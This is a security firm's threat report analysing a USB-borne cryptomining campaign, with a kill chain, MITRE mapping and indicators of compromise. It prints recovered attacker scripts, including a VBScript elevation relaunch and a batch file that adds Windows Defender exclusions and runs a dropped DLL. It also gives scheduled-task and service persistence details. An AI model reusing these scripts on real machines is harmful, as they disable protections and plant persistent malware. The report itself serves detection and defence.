Homepage
/
Insights
/
Tangerine Turkey Multi-Stage Cryptomining Campaign
Mar 10, 2026

Tangerine Turkey Multi-Stage Cryptomining Campaign

We Secure has encountered a multi-stage intrusion campaign attributed to Tangerine Turkey

Summary

Tangerine Turkey Multi-Stage USB-Propagated Cryptomining Campaign

Release Type: Public
Attribution: Tangerine Turkey
Primary Objective: Financial/Cryptomining
Initial Vector: Malicious USB device

Executive Summary

We Secure has investigated a multi-stage intrusion campaign attributed to the threat actor cluster designated TangerineTurkey. The campaign leverages weaponized USB devices as the initial delivery mechanism, executing a tightly structured attack chain that progresses through privilege escalation, defense evasion, multi-layer persistence, and kernel-level exploitation before deploying an XMRig-based cryptominer.

The campaign culminates in the exploitation of CVE-2020-14979, a known vulnerability in the WinRing0 driver (BringYour Own Vulnerable Driver -BYOVD technique), to achieve Ring 0 execution. Once kernel access is established, the XMRig Monero miner (u458854.exe) is deployed, connecting outbound to r3.hashpoolps.net:443 for mining operations.The primary objective is financial gain through unauthorized cryptocurrency mining (resource hijacking).

This campaign demonstrates sophisticated staging discipline: each component serves a discrete function within the killchain, making attribution and detection harder. The abuse of trusted Windows binaries (rundll32.exe, svchost.exe) and the strategic placement of artifacts within System32 are deliberate attempts to blend with legitimate operating systemactivity.

Threat Context & Campaign Scope

Research from the wider security community indicates that Tangerine Turkey operates within a significantly largercampaign ecosystem. The malware has been linked to a global operation, sometimes referred to as the UniversalMining Operation, that had reportedly infected over 270,000 endpoints across 135 countries as of late 2024, perfindings published by Azerbaijan's CERT.

The USB-based propagation model is self-sustaining: victims who use infected USB drives at shared public devices(print shops, internet cafes, shared workstations) unknowingly act as vectors for further distribution. This mechanismdoes not require network-based lateral movement, making it particularly effective in air-gapped or restrictedenvironments.

The BYOVD technique used here is part of a broader industry trend where threat actors exploit legitimately signed,vulnerable drivers to bypass Kernel Patch Protection (KPP) and modern EDR solutions. The WinRing0 driver hasappeared in multiple unrelated campaigns, underscoring the need for organizations to block known vulnerable driverhashes via WDAC or HVCI policies.

Attack Overview

USB Payload Structure

The weaponized USB device presents a benign-looking directory labeled KINGSTON to lure victim interaction.

The device contains:

  • KINGSTON.lnk - Weaponized Windows shortcut (entry point)
  • sysvolume\ - Hidden directory containing staged payload components
  • u454869.bat - Defense evasion and deployment batch script
  • u488653.dat - Malicious DLL (delivered as .dat to evade signature scanning)
  • u804289.vbs - VBScript UAC bypass launcher

User interaction with the shortcut initiates a controlled execution chain designed to:

  1. Elevate privileges
  2. Disable security protections
  3. Deploy malicious DLL
  4. Establish persistence
  5. Install malicious service
  6. Exploit vulnerable driver
  7. Deploy XMRig miner

Attack killchain

Tangerine Turkey – Kill Chain

Technical Analysis

Initial Execution

‍File: KINGSTON.lnk‍

‍Invokes: u804289.vbs

The VBScript performs a UAC bypass-style re-execution using ShellExecute with the runas verb to elevate privileges.

Behavior

  • Checks for execution argument marker
  • Relaunches itself with elevated privileges
  • Executes secondary batch file

u804289.vbs context

If Not WScript.Arguments.Named.Exists("u914587") Then
Set sh = CreateObject("Shell.Application")
sh.ShellExecute "wscript.exe", _
"""" & WScript.ScriptFullName & """ /u914587", _
"", _
"runas", _
1
WScript.Quit
End If
Set fs = CreateObject("Scripting.FileSystemObject")
pr = fs.GetParentFolderName(WScript.ScriptFullName)
pt = pr & "\u454869.bat"
If fs.FileExists(pt) Then
Set ws = WScript.CreateObject("WScript.Shell")

Defense Evasion & Payload Deployment

File:u454869.bat

Actions performed:

  • Adds Windows Defender exclusions: USB directory path & C:\Windows\System32
  • Copies u488653.dat to:
C:\Windows\System32\u488653.dll

‍

  • Executes malicious DLL via:
rundll32.exe C:\Windows\System32\u488653.dll,IdllEntry 1

‍

This stage ensures both reduced detection surface and successful DLL execution under trusted Windows binary context.

u454869.bat context:

@echo off
chcp 65001
explorer "%~dp0..\KINGSTON"
if exist "%~dp0u488653.dat" if not exist "C:\Windows\System32\u488653.dll" (
powershell -Command "Add-MpPreference -ExclusionPath '%~dp0';"
powershell -Command "Add-MpPreference -ExclusionPath
'C:\Windows\System32';"
timeout /t 3 /nobreak
copy /Y "%~dp0u488653.dat" "C:\Windows\System32\u488653.dll"
C:\Windows\System32\rundll32.exe C:\Windows\System32\u488653.dll,IdllEntry
1
)

Secondary Payload Deployment and Scheduled Task Persistence

The executed DLL:

  • Drops svcin64.exe in System32
  • Copies svcinf64.exe as svctrl64.exe
  • Uses renamed binary for persistence setup
  • Creates scheduler tasks for persistence called svctrl64

svctrl64 scheduler task configuration snippet

  <RegistrationInfo>
    <URI>\svctrl64</URI>
  </RegistrationInfo>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\svctrl64.exe</Command>
    </Exec>
  </Actions>

Windows Service as Persistence

Through the newly created process from binary svctrl64.exe the threat actor dropped a new binary called u158816.dll.

Creates a service referencing:

svchost.exe -k DcomLaunch
ServiceDLL: C:\Windows\System32\u158816.dll

‍

This embeds execution within a legitimate Windows service hosting model.

Analyze the registry file for given Service

Kernel-Level Exploitation & Cryptominer Deployment

During the final stage of the intrusion, the adversary deployed a malicious component set within:

C:\Windows\System32\wsvcz\

‍

This deployment included:

  • WinRing0x64.sys (vulnerable driver)
  • XMRig cryptominer binary (u458854.exe)

The actor leveraged CVE-2020-14979, a known vulnerability in the WinRing0 driver, to obtain kernel-level (Ring 0) execution privileges. This technique allowed the adversary to bypass security controls and operate with maximum system authority.

Once kernel access was established, the campaign initiated the XMRig miner to begin cryptocurrency mining operations.

Observed Behavior

  • Driver load events referencing WinRing0x64.sys
  • Execution of miner process from non-standard system subdirectory
  • Outbound connections to mining infrastructure
  • Sustained high CPU utilization
  • Resource exhaustion impacting system performance

Objective

The ultimate objective of this stage was resource hijacking for financial gain through unauthorized cryptocurrency mining.

MITRE ATT&CK
‍

Tactic Technique MITRE ID
Initial Access User Execution (Malicious LNK via USB) T1204
Execution Command and Scripting Interpreter (VBScript / Batch) T1059
Defense Evasion Impair Defenses (Windows Defender Exclusions) T1562
Defense Evasion Signed Binary Proxy Execution (rundll32.exe) T1218
Persistence Scheduled Task T1053
Persistence Create or Modify System Process (Service DLL) T1543
Privilege Escalation Exploitation for Privilege Escalation (CVE-2020-14979) T1068
Impact Resource Hijacking (Cryptomining – XMRig) T1496

Indicators of Compromise (IoCs)

‍

Tangerine Turkey – IoC Table
Type Indicator Value
File KINGSTON.lnk Weaponized USB shortcut initial execution lure
KINGSTON.lnk
File u804289.vbs VBScript launcher UAC bypass via ShellExecute runas
b2706ae678c052e9512348ebf52e134b76d69056d4c674f98f0b4ef111b62ee4
File u454869.bat Batch script adds Defender exclusions, copies .dat β†’ .dll
b24100ca71a4ef323c4b76235e0cf0f85e7d76739ac171dc6e91ec9d8b4f8cf8
File u488653.dat / u488653.dll Core malicious DLL executed via rundll32.exe IdllEntry
u488653.dat β†’ u488653.dll
File svcin64.exe / svctrl64.exe Dropped binary registers scheduled task & service persistence
96870d6e416470f053b91777e22f1d859ad19eee0fd2df816df3ecebe9560cf7
File u158816.dll Service DLL loaded by svchost.exe -k DcomLaunch
u158816.dll
File WinRing0x64.sys Vulnerable signed driver BYOVD, kernel Ring 0 access
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
File u458854.exe XMRig cryptominer deployed to C:\Windows\System32\wsvcz\
63aa8da1aedb07d075c13f700877a7525df5b4f434c5f24026a77365517cb225
Path Malicious DLL drop location Copied from USB staging directory to System32
C:\Windows\System32\u488653.dll
Path Persistence binary location Used to register scheduled task and Windows service
C:\Windows\System32\svctrl64.exe
Path Service DLL location Loaded by svchost.exe DcomLaunch group
C:\Windows\System32\u158816.dll
Path Miner staging directory Non-standard folder containing driver and XMRig binary
C:\Windows\System32\wsvcz\
Task Malicious scheduled task Runs as SYSTEM (S-1-5-18) with HighestAvailable privileges
\svctrl64
Registry ServiceDLL persistence key ImagePath: svchost.exe -k DcomLaunch
HKLM\SYSTEM\CurrentControlSet\Services\[svc]\Parameters\ServiceDll
Network Mining pool C2 hostname XMRig Monero pool outbound TLS connection on port 443
r3.hashpoolps.net
Network Mining pool resolved IP Observed outbound TLS connection from victim host
91.206.169.76:443
CVE WinRing0 privilege escalation BYOVD kernel Ring 0 execution, CPU register manipulation

Conclusion

The Tangerine Turkey campaign represents a professionally staged, multi-layer intrusion optimized for stealth andpersistence. The deliberate use of trusted Windows binaries, dual persistence mechanisms (scheduled task + service),and kernel-level BYOVD exploitation places this campaign above commodity malware in terms of technical sophistication.

The ultimate objective, unauthorized Monero mining is financially motivated, but the same infrastructure and accesslevel could trivially support more destructive objectives including data exfiltration, ransomware staging, or lateralmovement in enterprise environments. Organizations should treat this campaign as a high-severity threat requiringimmediate detection rule deployment and driver blocklist enforcement.

‍

Find the Best Solution to Your Business

Get in touch
Tags:
Knowledge hub

You May Also Like...

check all insights